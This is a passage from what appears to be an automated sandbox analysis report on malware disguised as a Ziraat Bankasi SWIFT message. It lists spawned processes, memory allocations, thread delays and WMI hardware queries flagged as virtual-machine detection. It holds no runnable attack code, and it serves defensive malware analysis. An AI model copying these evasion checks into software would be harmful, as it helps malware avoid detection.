Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YkxAHNcqEmoeLS.exe PID: 892, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 1250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 7D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 8EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 9EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 13F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory allocated: 5160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1AB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 2930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 2780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 26C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 46C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 7150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 8150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 82F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 92F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory allocated: 2830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1AB80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 434F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6063	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 7424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 2398	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 7959
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 1831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8142
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 3272
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 6529

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe TID: 5068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 652	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe TID: 5948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 576	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7548	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 1532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 8142 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328	Thread sleep count: 301 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8020	Thread sleep time: -20291418481080494s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
